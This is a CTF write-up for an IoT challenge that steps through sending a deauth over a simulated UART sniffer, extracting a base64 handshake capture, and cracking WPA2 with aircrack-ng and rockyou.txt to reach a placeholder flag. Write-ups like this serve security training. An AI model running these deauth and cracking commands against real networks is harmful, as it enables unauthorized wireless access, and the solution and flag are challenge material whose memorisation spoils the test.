ESPILON-CTF-2026-Writeups/IoT/Cr4cK_w1f1

Cr4cK_W1F1

Field	Value
Category	IoT
Difficulty	Medium
Points	TBD
Author	Eun0us
CTF	Espilon 2026

---

Description

You recover a UART access on a red team WiFi sniffer tool. Analyze the captured data to recover the WiFi password, then connect to the network and retrieve the flag.

• TX (read UART): port 1111
• RX (write UART): port 2222

---

TL;DR

Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART output (base64-encoded), crack the handshake with aircrack-ng and rockyou.txt to find the passphrase sunshine, then connect and read the flag.

---

Tools

Tool	Purpose
nc	Connect to UART TX/RX ports
base64	Decode the PCAP blob
aircrack-ng	Crack WPA2 handshake
rockyou.txt	Password wordlist

---

Solution

Step 1 — Open both UART channels

# Terminal 1 — TX (read output)
nc <host> 1111

# Terminal 2 — RX (send commands)
nc <host> 2222

Step 2 — Start the sniffer and force a deauth

In the RX terminal:

sniffer start
deauth TestNet 02:00:00:aa:00:01
sniffer stop

The deauthentication forces the target client to reconnect and redo the WPA2 4-way handshake.

Step 3 — Extract the PCAP from TX

On the TX terminal, output appears between markers:

PCAP_BASE64_BEGIN
<base64 data>
PCAP_BASE64_END

Copy the base64 lines to a file and decode:

base64 -d handshake.b64 > handshake.pcap

Step 4 — Crack the WPA2 handshake

aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap

Output:

KEY FOUND! [ sunshine ]

Step 5 — Connect and read the flag

In the RX terminal:

connect TestNet sunshine
cat /flag.txt

---

Flag

CTF{CR4CK_W1F1_EXAMPLE}

Note: This challenge was still being finalized at time of writing. The flag above is a placeholder; the real flag will be updated before deployment.